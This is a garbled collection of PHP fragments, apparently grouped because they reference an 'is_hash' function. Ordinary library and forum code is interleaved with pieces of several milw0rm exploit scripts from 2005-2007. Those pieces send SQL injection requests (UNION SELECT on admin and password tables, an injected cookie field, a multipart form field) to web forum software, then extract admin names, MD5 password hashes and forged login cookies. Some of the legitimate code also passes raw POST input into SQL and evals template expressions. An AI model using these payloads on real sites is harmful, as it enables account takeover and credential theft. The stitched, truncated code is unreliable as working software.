function output($txt)
{
if (is_hash($txt)) {
$out = '[';
foreach ($txt as $k => $v) {
$out .= output($k) . " => " . output($v) . ', ';
}
$out .= "]";
return $out;
} else {
if (is_array($txt)) {
$out = '[';
foreach ($txt as $k) {
$out .= output($k) . ', ';
}
$out .= "]";
return $out;
} else {
if ($txt === TRUE || $txt === FALSE) {
return $txt === TRUE ? "true" : "false";
} else {
return "'{$txt}'";
}
}
}
}
public function alias($fields)
{
if (is_array($fields)) {
if (is_hash($fields)) {
foreach ($fields as $alias => $field) {
if (!is_numeric($alias)) {
$fields[$alias] = $field . ' AS ' . $alias;
}
}
}
$fields = implode(',', $fields);
}
return $fields;
}
/**
* Pulls out the options hash from $array if any.
*
* @internal DO NOT remove the reference on $array.
* @param array &$array An array
* @return array A valid options array
*/
public static function extract_and_validate_options(array &$array)
{
$options = array();
if ($array) {
$last =& $array[count($array) - 1];
try {
if (self::is_options_hash($last)) {
array_pop($array);
$options = $last;
}
} catch (ActiveRecordException $e) {
if (!is_hash($last)) {
throw $e;
}
$options = array('conditions' => $last);
}
}
return $options;
}
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);
$packet = "GET " . $p . "index.php?mode=viewid&post_id={$post_id} HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
$temp = explode('"message"><!--', $html);
for ($i = 1; $i < count($temp); $i++) {
$temp2 = explode("-->", $temp[$i]);
if (is_hash($temp2[0])) {
$hash = $temp2[0];
$temp2 = explode("-->", $temp[$i + 1]);
$admin = $temp2[0];
echo "----------------------------------------------------------------\n";
echo "admin -> " . $admin . "\n";
echo "password (md5) -> " . $hash . "\n";
echo "----------------------------------------------------------------\n";
die;
}
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-08-07]
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: text/plain\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
if (eregi("Gadget is not enabled", $html)) {
die("search gadget is not enabled... exploit failed");
}
$temp = explode('">*SUNTZOI*', $html);
$temp2 = explode('*SUNTZOI*', $temp[1]);
$admin = $temp2[0];
$temp = explode('href="*SUNTZU*', $html);
$temp2 = explode('*SUNTZU*', $temp[1]);
$hash = $temp2[0];
if ($admin != '' and $hash != '' and is_hash($hash)) {
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin -> " . $admin . "\r\n";
echo "password (md5) -> " . $hash . "\r\n";
echo "--------------------------------------------------------------------\r\n";
} else {
echo "Exploit failed, maybe wrong table prefix...";
}
?>
# milw0rm.com [2006-06-23]
function smarty_function_mtsetvar($args, &$ctx)
{
// status: complete
// parameters: name, value
$name = $args['name'];
$name or $name = $args['var'];
if (!$name) {
return '';
}
$value = $args['value'];
$vars =& $ctx->__stash['vars'];
if (strtolower($name) == 'page_layout') {
# replaces page layout for current page
require_once "MTUtil.php";
$columns = get_page_column($value);
$vars['page_columns'] = $columns;
$vars['page_layout'] = $value;
}
if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
$func = $matches[1];
$name = $matches[2];
} else {
if (array_key_exists('function', $args)) {
$func = $args['function'];
}
}
# pick off any {...} or [...] from the name.
if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
$name = $matches[1];
$br = $matches[2];
$ref = $matches[3];
if (preg_match('/^\\$(.+)/', $ref, $ref_matches)) {
$ref = $vars[$ref_matches[1]];
if (!isset($ref)) {
$ref = chr(0);
}
}
$br == '[' ? $index = $ref : ($key = $ref);
} else {
if (array_key_exists('index', $args)) {
$index = $args['index'];
} else {
if (array_key_exists('key', $args)) {
$key = $args['key'];
}
}
}
if (preg_match('/^\\$/', $name)) {
$name = $vars[$name];
if (!isset($name)) {
return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>"));
}
}
$existing = $vars[$name];
require_once "MTUtil.php";
if (isset($key)) {
if (!isset($existing)) {
$existing = array($key => $value);
} elseif (is_hash($existing)) {
$existing = $existing[$key];
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not a hash.", $name));
}
} elseif (isset($index)) {
if (!isset($existing)) {
$existing[$index] = $value;
} elseif (is_array($existing)) {
if (is_numeric($index)) {
$existing = $existing[$index];
} else {
return $ctx->error($ctx->mt->translate("Invalid index."));
}
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
}
}
if (array_key_exists('append', $args) && $args['append']) {
$value = isset($existing) ? $existing . $value : $value;
} elseif (array_key_exists('prepend', $args) && $args['prepend']) {
$value = isset($existing) ? $value . $existing : $value;
} elseif (isset($existing) && array_key_exists('op', $args)) {
$op = $args['op'];
$value = _math_operation($op, $existing, $value);
if (!isset($value)) {
return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $existing, $op, $value));
}
}
$data = $vars[$name];
if (isset($key)) {
if (isset($func) && 'delete' == strtolower($func)) {
unset($data[$key]);
} else {
$data[$key] = $value;
}
} elseif (isset($index)) {
$data[$index] = $value;
} elseif (isset($func)) {
if ('undef' == strtolower($func)) {
unset($data);
} else {
if (isset($data) && !is_array($data)) {
return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name));
}
if (!isset($data)) {
$data = array();
}
if ('push' == strtolower($func)) {
array_push($data, $value);
} elseif ('unshift' == strtolower($func)) {
array_unshift($data, $value);
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function.", $func));
}
}
} else {
$data = $value;
}
$hash = $ctx->stash('__inside_set_hashvar');
if (isset($hash)) {
$hash[$name] = $data;
$ctx->stash('__inside_set_hashvar', $hash);
} else {
if (is_array($vars)) {
$vars[$name] = $data;
} else {
$vars = array($name => $data);
$ctx->__stash['vars'] =& $vars;
}
}
return '';
}
function smarty_block_mtif($args, $content, &$ctx, &$repeat)
{
if (!isset($content)) {
$result = 0;
$name = isset($args['name']) ? $args['name'] : $args['var'];
if (isset($name)) {
unset($ctx->__stash['__cond_tag__']);
# pick off any {...} or [...] from the name.
if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
$name = $matches[1];
$br = $matches[2];
$ref = $matches[3];
if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
$ref = $vars[$ref_matches[1]];
if (!isset($ref)) {
$ref = chr(0);
}
}
$br == '[' ? $index = $ref : ($key = $ref);
} else {
if (array_key_exists('index', $args)) {
$index = $args['index'];
} else {
if (array_key_exists('key', $args)) {
$key = $args['key'];
}
}
}
if (preg_match('/^$/', $name)) {
$name = $vars[$name];
if (!isset($name)) {
return $ctx->error($ctx->mt->translate("You used an [_1] tag without a valid name attribute.", "<MT{$tag}>"));
}
}
if (isset($name)) {
$value = $ctx->__stash['vars'][$name];
require_once "MTUtil.php";
if (is_hash($value)) {
if (isset($key)) {
if ($key != chr(0)) {
$val = $value[$key];
} else {
unset($value);
}
} else {
$val = $value;
}
} elseif (is_array($value)) {
if (isset($index)) {
if (is_numeric($index)) {
$val = $value[$index];
} else {
unset($value);
# fall through to any 'default'
}
} else {
$val = $value;
}
} else {
$val = $value;
}
}
} elseif (isset($args['tag'])) {
$tag = $args['tag'];
$tag = preg_replace('/^mt:?/i', '', $tag);
$largs = $args;
// local arguments without 'tag' element
unset($largs['tag']);
try {
$val = $ctx->tag($tag, $largs);
} catch (exception $e) {
$val = '';
}
}
if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
if (function_exists($val)) {
ob_start();
$val($ctx, array());
$val = ob_get_contents();
ob_end_clean();
} else {
$val = '';
}
}
if (isset($args['tag'])) {
$ctx->__stash['__cond_tag__'] = $args['tag'];
} else {
if (isset($args['name'])) {
$var_key = $args['name'];
} else {
if (isset($args['var'])) {
$var_key = $args['var'];
}
}
$ctx->__stash['__cond_name__'] = $var_key;
}
$ctx->__stash['__cond_value__'] = $val;
if (array_key_exists('op', $args)) {
$op = $args['op'];
$rvalue = $args['value'];
if ($op && isset($value) && !is_array($value)) {
$val = _math_operation($op, $val, $rvalue);
if (!isset($val)) {
return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", array($value, $op, $rvalue)));
}
}
}
if (array_key_exists('eq', $args)) {
$val2 = $args['eq'];
$result = $val == $val2 ? 1 : 0;
} elseif (array_key_exists('ne', $args)) {
$val2 = $args['ne'];
$result = $val != $val2 ? 1 : 0;
} elseif (array_key_exists('gt', $args)) {
$val2 = $args['gt'];
$result = $val > $val2 ? 1 : 0;
} elseif (array_key_exists('lt', $args)) {
$val2 = $args['lt'];
$result = $val < $val2 ? 1 : 0;
} elseif (array_key_exists('ge', $args)) {
$val2 = $args['ge'];
$result = $val >= $val2 ? 1 : 0;
} elseif (array_key_exists('le', $args)) {
$val2 = $args['le'];
$result = $val <= $val2 ? 1 : 0;
} elseif (array_key_exists('like', $args)) {
$patt = $args['like'];
$opt = "";
if (preg_match("/^\\/.+\\/([si]+)?\$/", $patt, $matches)) {
$patt = preg_replace("/^\\/|\\/([si]+)?\$/", "", $patt);
if ($matches[1]) {
$opt = $matches[1];
}
} else {
$patt = preg_replace("!/!", "\\/", $patt);
}
$result = preg_match("/{$patt}/{$opt}", $val) ? 1 : 0;
} elseif (array_key_exists('test', $args)) {
$expr = 'return (' . $args['test'] . ') ? 1 : 0;';
// export vars into local variable namespace, then eval expr
extract($ctx->__stash['vars']);
$result = eval($expr);
if ($result === FALSE) {
die("error in expression [" . $args['test'] . "]");
}
} else {
$result = isset($val) && $val ? 1 : 0;
}
return $ctx->_hdlr_if($args, $content, $ctx, $repeat, $result);
} else {
$vars =& $ctx->__stash['vars'];
return $ctx->_hdlr_if($args, $content, $ctx, $repeat);
}
}
private function apply_where_conditions($args)
{
require_once 'Expressions.php';
$num_args = count($args);
if ($num_args == 1 && is_hash($args[0])) {
$hash = is_null($this->joins) ? $args[0] : $this->prepend_table_name_to_fields($args[0]);
$e = new Expressions($this->connection, $hash);
$this->where = $e->to_s();
$this->where_values = array_flatten($e->values());
} elseif ($num_args > 0) {
// if the values has a nested array then we'll need to use Expressions to expand the bind marker for us
$values = array_slice($args, 1);
foreach ($values as $name => &$value) {
if (is_array($value)) {
$e = new Expressions($this->connection, $args[0]);
$e->bind_values($values);
$this->where = $e->to_s();
$this->where_values = array_flatten($e->values());
return;
}
}
// no nested array so nothing special to do
$this->where = $args[0];
$this->where_values =& $values;
}
}
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Cookie: threadvisit={$sql};\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
$temp = explode("#post", $html);
$temp2 = explode("\n", $temp[1]);
echo chr((int) $temp2[0]);
$user .= chr((int) $temp2[0]);
}
echo "\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}", trim($hash))) {
return true;
} else {
return false;
}
}
if (is_hash($hash)) {
print_r('
exploit succeeded, try this cookie:
wbb_userid=' . $uid . '; wbb_userpassword='******';
');
} else {
echo "exploit failed...\n";
}
?>
# milw0rm.com [2006-11-24]
$temp2 = explode('"', $temp[1]);
$HASH = $temp2[0];
if (is_hash($HASH)) {
echo "HASH ->" . htmlentities($HASH) . "<BR>";
die("Exploit Succeeded...");
} else {
echo "Step 1 failed... trying step 2...<br>";
}
#STEP 2 -> if STEP 1 failed, vulnerability in getfile.php... this works with magic_quotes off
$SQL = "'UNION SELECT value,value FROM " . $prefix . "variables1 WHERE name='admin_password'/*";
$SQL = urlencode($SQL);
$packet = "GET " . $p . "getfile.php?cat=" . $SQL . " HTTP/1.1\r\n";
$packet .= "User-Agent: Python-urllib/2.0a1, maybe ;)\r\n";
$packet .= "Accept: text/plain\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp = explode('Content-Type: ', $html);
$temp2 = explode(chr(0xd), $temp[1]);
$HASH = $temp2[0];
if (is_hash($HASH)) {
echo "HASH ->" . htmlentities($HASH) . "<BR>Exploit Succeeded...";
} else {
echo "Exploit failed...";
}
}
?>
# milw0rm.com [2005-12-24]
echo "admin -> " . $my_admin . "[???]\n";
sleep(1);
break;
}
if ($i == 255) {
die("Exploit failed...");
}
}
$j++;
}
echo "--------------------------------------------------------------------\n";
echo "admin -> " . $my_admin . "\n";
echo "password (md5) -> " . $my_password . "\n";
echo "--------------------------------------------------------------------\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}", trim($hash))) {
return true;
} else {
return false;
}
}
if (is_hash($my_password)) {
echo "Exploit succeeded...";
} else {
echo "Exploit failed...";
}
?>
# milw0rm.com [2006-09-21]
$searchresult[] = $row['topic_id'];
}
if (count($searchresult) > 0) {
$data = array('ids' => $searchresult, 'ignored' => $ignored, 'used' => $used, 'search' => $gpc->get('search', str), 'name' => $gpc->get('name', str), 'boards' => $gpc->get('boards', arr_int), 'opt_0' => $gpc->get('opt_0', int), 'opt_1' => $gpc->get('opt_1', int), 'opt_2' => $gpc->get('opt_2', int), 'temp' => $gpc->get('temp', int), 'temp2' => $gpc->get('temp2', int), 'sort' => $gpc->get('sort', str), 'order' => $gpc->get('order', str));
$fid = md5(microtime());
file_put_contents('cache/search/' . $fid . '.inc.php', serialize($data));
$slog->updatelogged();
$db->close();
viscacha_header('Location: search.php?action=result&fid=' . $fid . SID2URL_JS_x);
exit;
} else {
error($lang->phrase('search_nothingfound'), 'search.php' . SID2URL_1);
}
} elseif ($_GET['action'] == "result") {
$fid = $gpc->get('fid');
if (!is_hash($fid)) {
error($lang->phrase('query_string_error'), 'search.php' . SID2URL_1);
}
$file = "cache/search/{$fid}.inc.php";
if (!file_exists($file)) {
error($lang->phrase('search_doesntexist'), 'search.php' . SID2URL_1);
}
$data = file_get_contents($file);
$data = unserialize($data);
$ignored = array();
foreach ($data['ignored'] as $row) {
$row = trim($row);
if (!empty($row)) {
$ignored[] = $row;
}
}
function writeValueWithSpec()
{
$args = func_get_args();
$val = $args[0];
if (count($args) >= 2) {
$spec = $args[1];
} else {
$spec = $this->spec;
}
if (is_array($spec)) {
if (is_hash($spec)) {
$keys = array_keys($spec);
sort($keys);
if (is_object($val)) {
foreach ($keys as $k) {
$this->writeValueWithSpec($val->{$k}, $spec[$k]);
}
} else {
foreach ($keys as $k) {
$this->writeValueWithSpec($val[$k], $spec[$k]);
}
}
} else {
$this->writeValue(count($val), type_check(count($val)));
foreach ($val as $v) {
$this->writeValueWithSpec($v, $spec[0]);
}
}
} else {
if ($spec === (TRUEVAL & FALSEVAL)) {
$this->writeValue($val, type_check($val), TRUE);
} else {
$this->writeValue($val, $spec, TRUE);
}
}
}
echo "table prefix -> " . $prefix . "\n";
} else {
die("Unable to disclose table prefix...\n");
}
}
$diff = array(",0,0,0,0,0", ",0,0,0,0", ",0,0,0", ",0,0", ",0", "");
for ($j = 0; $j <= count($diff) - 1; $j++) {
$sql = "9999')/**/UNION/**/SELECT/**/1,0,0,0,CONCAT('*WhOp*',username,':',password,'*WhOp*'),0,0,0,0,0" . $diff[$j] . "/**/FROM " . $prefix . "_papoo_user/**/WHERE/**/gruppenid='g1,'/*";
$sql = urlencode($sql);
$packet = "GET " . $p . "forumthread.php?msgid=" . $sql . " HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp = explode("*WhOp*", $html);
for ($i = 1; $i <= count($temp) - 1; $i++) {
$temp2 = explode(":", $temp[$i]);
if (is_hash($temp2[1])) {
echo "--------------------------------------------------------\n";
echo "admin -> " . $temp2[0] . " \n";
echo "password (md5) -> " . $temp2[1] . " \n";
echo "--------------------------------------------------------\n";
die;
}
}
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-07-07]
function select_options($options = array(), $key = "", $value = "", $default_value = "")
{
$elem = array();
$i = is_hash($options);
while (list($key, $val) = each($options)) {
$key = $i ? $key : $val;
if ($default_value == $key) {
$elem[] = '<option value="' . $key . '" SELECTED>' . htmlspecialchars($val, ENT_QUOTES, 'UTF-8') . '</option>';
} else {
$elem[] = '<option value="' . $key . '">' . htmlspecialchars($val, ENT_QUOTES, 'UTF-8') . '</option>';
}
}
return implode("\n", $elem);
}
function save_error_data($fc, $fid = '')
{
global $gpc;
if (!is_hash($fid)) {
$fid = md5(microtime());
}
$cache = new CacheItem($fid, 'temp/errordata/');
$cache->set($fc);
$cache->export();
return $fid;
}
function smarty_block_mtloop($args, $content, &$ctx, &$repeat)
{
$localvars = array(array('__loop_keys', '__loop_values', '__out'), common_loop_vars());
if (!isset($content)) {
$ctx->localize($localvars);
$vars =& $ctx->__stash['vars'];
$value = '';
$name = $args['name'];
$name or $name = $args['var'];
if (!$name) {
return '';
}
if (isset($vars[$name])) {
$value = $vars[$name];
}
if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
if (function_exists($value)) {
ob_start();
$value($ctx, array());
$value = ob_get_contents();
ob_end_clean();
} else {
$value = '';
}
}
if (!is_array($value) || 0 == count($value)) {
$repeat = false;
return '';
}
$sort = $args['sort_by'];
$keys = array_keys($value);
if ($sort) {
$sort = strtolower($sort);
if (preg_match('/\\bkey\\b/', $sort)) {
usort($keys, create_function('$a,$b', 'return strcmp($a, $b);'));
} elseif (preg_match('/\\bvalue\\b/', $sort)) {
$sort_fn = '';
foreach (array_keys($value) as $key) {
$v = $value[$key];
$sort_fn .= "\$value['{$key}']='{$v}';";
}
if (preg_match('/\\bnumeric\\b/', $sort)) {
$sort_fn .= 'return $value[$a] === $value[$b] ? 0 : ($value[$a] > $value[$b] ? 1 : -1);';
$sorter = create_function('$a,$b', $sort_fn);
} else {
$sort_fn .= 'return strcmp($value[$a], $value[$b]);';
$sorter = create_function('$a,$b', $sort_fn);
}
usort($keys, $sorter);
}
if (preg_match('/\\breverse\\b/', $sort)) {
$keys = array_reverse($keys);
}
}
$counter = 1;
$ctx->stash('__loop_values', $value);
$ctx->stash('__out', false);
} else {
$counter = $ctx->__stash['vars']['__counter__'] + 1;
$keys = $ctx->stash('__loop_keys');
$value = $ctx->stash('__loop_values');
$out = $ctx->stash('__out');
if (!isset($keys) || $keys == 0) {
$ctx->restore($localvars);
$repeat = false;
if (isset($args['glue']) && $out && !empty($content)) {
$content = $args['glue'] . $content;
}
return $content;
}
}
$key = array_shift($keys);
$this_value = $value[$key];
$ctx->stash('__loop_keys', $keys);
$ctx->__stash['vars']['__counter__'] = $counter;
$ctx->__stash['vars']['__odd__'] = $counter % 2 == 1;
$ctx->__stash['vars']['__even__'] = $counter % 2 == 0;
$ctx->__stash['vars']['__first__'] = $counter == 1;
$ctx->__stash['vars']['__last__'] = count($keys) == 0;
$ctx->__stash['vars']['__key__'] = $key;
$ctx->__stash['vars']['__value__'] = $this_value;
if (is_array($this_value) && 0 < count($this_value)) {
require_once "MTUtil.php";
if (is_hash($this_value)) {
foreach (array_keys($this_value) as $inner_key) {
$ctx->__stash['vars'][strtolower($inner_key)] = $this_value[$inner_key];
}
}
}
if (isset($args['glue']) && !empty($content)) {
if ($out) {
$content = $args['glue'] . $content;
} else {
$ctx->stash('__out', true);
}
}
if (0 === count($keys)) {
$ctx->stash('__loop_keys', 0);
}
$repeat = true;
return $content;
}
} else {
($code = $plugins->load('editprofile_about2_query')) ? eval($code) : null;
$db->query("UPDATE {$db->pre}user SET about = '{$_POST['about']}' WHERE id = '{$my->id}'");
ok($lang->phrase('data_success'), "editprofile.php?action=about" . SID2URL_x);
}
} elseif ($_GET['action'] == "about") {
if ($my->p['useabout'] == 0) {
errorLogin($lang->phrase('not_allowed'), "editprofile.php");
}
$breadcrumb->Add($lang->phrase('editprofile_about'));
echo $tpl->parse("header");
echo $tpl->parse("menu");
($code = $plugins->load('editprofile_abos_Start')) ? eval($code) : null;
BBProfile($bbcode);
$fid = $gpc->get('fid', str);
if (is_hash($fid)) {
$data = $gpc->unescape(import_error_data($fid));
if ($_GET['job'] == 'preview') {
$preview = true;
$data = $gpc->unescape($data);
$parsedPreview = $bbcode->parse($data);
} else {
$preview = false;
}
} else {
$data = $my->about;
$preview = false;
}
$chars = numbers($config['maxaboutlength']);
($code = $plugins->load('editprofile_abos_prepared')) ? eval($code) : null;
echo $tpl->parse("editprofile/about");
/**
* Update a record in a table
*
* $dataobject is an object containing needed data
* Relies on $dataobject having a variable "id" to
* specify the record to update
*
* @uses $db
* @param string $table The database table to be checked against.
* @param array $dataobject An object with contents equal to fieldname=>fieldvalue. Must have an entry for 'id' to map to the table specified.
* @param mixed $where defines the WHERE part of the upgrade. Can be string (key) or array (keys) or hash (keys/values).
* If the first two, values are expected to be in $dataobject.
* @return bool
* @throws SQLException
*/
function update_record($table, $dataobject, $where = null)
{
global $db;
if (is_object($dataobject)) {
$dataobject = clone $dataobject;
}
if (empty($where)) {
$where = 'id';
if (!isset($dataobject->id)) {
// nothing to put in the where clause and we don't want to update everything
throw new SQLException('update_record called with no where clause and no ID');
}
}
$wherefields = array();
$wherevalues = array();
$values = array();
if (is_string($where)) {
// treat it like a stack (ie, field in dataobject)
$where = array($where);
}
if (is_object($where) || is_hash($where)) {
// the values are contained in the where ...
foreach ((array) $where as $field => $value) {
$wherefields[] = $field;
$wherevalues[] = $value;
unset($dataobject->{$field});
}
} else {
if (is_array($where)) {
// look for the values in $dataobject and complain bitterly if they're not there
foreach ($where as $field) {
if (!isset($dataobject->{$field})) {
throw new SQLException('Field in where clause not in the update object');
}
$wherefields[] = $field;
$wherevalues[] = $dataobject->{$field};
unset($dataobject->{$field});
}
} else {
throw new SQLException('the $where object is in a very odd form');
}
}
static $table_columns;
// Determine all the fields in the table
if (is_array($table_columns) && isset($table_columns[$table])) {
$columns = $table_columns[$table];
} else {
if (!($columns = $db->MetaColumns(get_config('dbprefix') . $table))) {
throw new SQLException('Could not get columns for table ' . $table);
}
$table_columns[$table] = $columns;
}
$data = (array) $dataobject;
// Pull out data matching these fields
$ddd = array();
foreach ($columns as $column) {
if (!in_array($column->name, $wherefields) && array_key_exists($column->name, $data)) {
$ddd[$column->name] = $data[$column->name];
// PostgreSQL bytea support
if (is_postgres() && $column->type == 'bytea') {
$ddd[$column->name] = $db->BlobEncode($ddd[$column->name]);
}
}
}
// Construct SQL queries
$numddd = count($ddd);
$count = 0;
$update = '';
foreach ($ddd as $key => $value) {
$count++;
$update .= db_quote_identifier($key) . ' = ? ';
if ($count < $numddd) {
$update .= ', ';
}
$values[] = $value;
}
$whereclause = '';
$count = 0;
$numddd = count($wherefields);
foreach ($wherefields as $field) {
$count++;
$whereclause .= db_quote_identifier($field) . ' = ? ';
if ($count < $numddd) {
$whereclause .= ' AND ';
}
}
$sql = 'UPDATE ' . db_table_name($table) . ' SET ' . $update . ' WHERE ' . $whereclause;
try {
$stmt = $db->Prepare($sql);
increment_perf_db_writes();
$rs = $db->Execute($stmt, array_merge($values, $wherevalues));
return true;
} catch (ADODB_Exception $e) {
throw new SQLException(create_sql_exception_message($e, $sql, array_merge($values, $wherevalues)));
}
}
public function options_to_sql($options)
{
$table = array_key_exists('from', $options) ? $options['from'] : $this->get_fully_qualified_table_name();
$sql = new SQLBuilder($this->conn, $table);
if (array_key_exists('joins', $options)) {
$sql->joins($this->create_joins($options['joins']));
// by default, an inner join will not fetch the fields from the joined table
if (!array_key_exists('select', $options)) {
$options['select'] = $this->get_fully_qualified_table_name() . '.*';
}
}
if (array_key_exists('select', $options)) {
$sql->select($options['select']);
}
if (array_key_exists('conditions', $options)) {
if (!is_hash($options['conditions'])) {
if (is_string($options['conditions'])) {
$options['conditions'] = array($options['conditions']);
}
call_user_func_array(array($sql, 'where'), $options['conditions']);
} else {
if (!empty($options['mapped_names'])) {
$options['conditions'] = $this->map_names($options['conditions'], $options['mapped_names']);
}
$sql->where($options['conditions']);
}
}
if (array_key_exists('order', $options)) {
$sql->order($options['order']);
}
if (array_key_exists('limit', $options)) {
$sql->limit($options['limit']);
}
if (array_key_exists('offset', $options)) {
$sql->offset($options['offset']);
}
if (array_key_exists('group', $options)) {
$sql->group($options['group']);
}
if (array_key_exists('having', $options)) {
$sql->having($options['having']);
}
return $sql;
}
$data = "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n";
$data .= "{$SQL}\r\n";
$data .= "-----------------------------7d61bcd1f033e--\r\n";
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "SUNTZU: " . $argu . "\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
if (eregi("<pre><b>ThWboard Error</b><br>", $html)) {
echo $html;
die("\n\nquery error... see html");
}
$temp = explode("templates/", $html);
$temp2 = explode("/", $temp[1]);
$pwd_hash = $temp2[0];
if (is_hash($pwd_hash)) {
die("pwd hash (md5) -> " . $pwd_hash . "\n");
}
if (eregi("templates//frame.html", $html)) {
echo "no user with given name...\n";
}
echo "exploit failed...\n\n" . $html;
}
?>
# milw0rm.com [2007-01-14]
function array_join_merge($arr1, $arr2)
{
// written by dev-null@christophe.vg
// taken from http://www.php.net/manual/en/function.array-merge-recursive.php
if (is_array($arr1) && is_array($arr2)) {
// the same -> merge
$new_array = array();
if (is_hash($arr1) && is_hash($arr2)) {
// hashes -> merge based on keys
$keys = array_merge(array_keys($arr1), array_keys($arr2));
foreach ($keys as $key) {
$new_array[$key] = array_join_merge(@$arr1[$key], @$arr2[$key]);
}
} else {
// two real arrays -> merge
$new_array = array_reverse(array_unique(array_reverse(array_merge($arr1, $arr2))));
}
return $new_array;
} else {
// not the same ... take new one if defined, else the old one stays
return $arr2 ? $arr2 : $arr1;
}
}
}
if ($i == 255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}", trim($hash))) {
return true;
} else {
return false;
}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid=' . $uid . '; wbb_userpassword='******';
--------------------------------------------------------------------------
');
if ($uid == 1) {
echo "done, but... to have access to admin panel you need to break the hash\n";
}
} else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-23]
function smarty_function_mtvar($args, &$ctx)
{
// status: complete
// parameters: name
if (array_key_exists('value', $args) && !array_key_exists('op', $args)) {
require_once "function.mtsetvar.php";
return smarty_function_mtsetvar($args, $ctx);
}
require_once "MTUtil.php";
$vars =& $ctx->__stash['vars'];
$value = '';
$name = $args['name'];
$name or $name = $args['var'];
if (preg_match('/^(config|request)\\.(.+)$/i', $name, $m)) {
if (strtolower($m[1]) == 'config') {
if (!preg_match('/password/i', $m[2])) {
global $mt;
return $mt->config[strtolower($m[2])];
}
} elseif (strtolower($m[1]) == 'request') {
return $_REQUEST[$m[2]];
}
}
if (!$name) {
return '';
}
if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
$func = $matches[1];
$name = $matches[2];
} else {
if (array_key_exists('function', $args)) {
$func = $args['function'];
}
}
# pick off any {...} or [...] from the name.
if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
$name = $matches[1];
$br = $matches[2];
$ref = $matches[3];
if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
$ref = $vars[$ref_matches[1]];
if (!isset($ref)) {
$ref = chr(0);
}
}
$br == '[' ? $index = $ref : ($key = $ref);
} else {
if (array_key_exists('index', $args)) {
$index = $args['index'];
} else {
if (array_key_exists('key', $args)) {
$key = $args['key'];
}
}
}
if (preg_match('/^\\$/', $name)) {
$name = $vars[$name];
if (!isset($name)) {
return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>"));
}
}
if (isset($vars[$name])) {
$value = $vars[$name];
}
if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
if (function_exists($value)) {
ob_start();
$value($ctx, array());
$value = ob_get_contents();
ob_end_clean();
} else {
$value = '';
}
}
$return_val = $value;
if (isset($name)) {
if (is_hash($value)) {
if (isset($key)) {
if (isset($func)) {
if ('delete' == strtolower($func)) {
$return_val = $value[$key];
unset($value[$key]);
$vars[$name] = $value;
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
}
} else {
if ($key != chr(0)) {
$return_val = $value[$key];
} else {
unset($value);
}
}
} elseif (isset($func)) {
if ('count' == strtolower($func)) {
$return_val = count(array_keys($value));
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
}
} else {
if (array_key_exists('to_json', $args) && $args['to_json']) {
if (function_exists('json_encode')) {
$return_val = json_encode($value);
} else {
$return_val = '';
}
}
}
} elseif (is_array($value)) {
if (isset($index)) {
if (is_numeric($index)) {
$return_val = $value[$index];
} else {
unset($value);
# fall through to any 'default'
}
} elseif (isset($func)) {
$func = strtolower($func);
if ('pop' == $func) {
$return_val = array_pop($value);
$vars[$name] = $value;
} elseif ('shift' == $func) {
$return_val = array_shift($value);
$vars[$name] = $value;
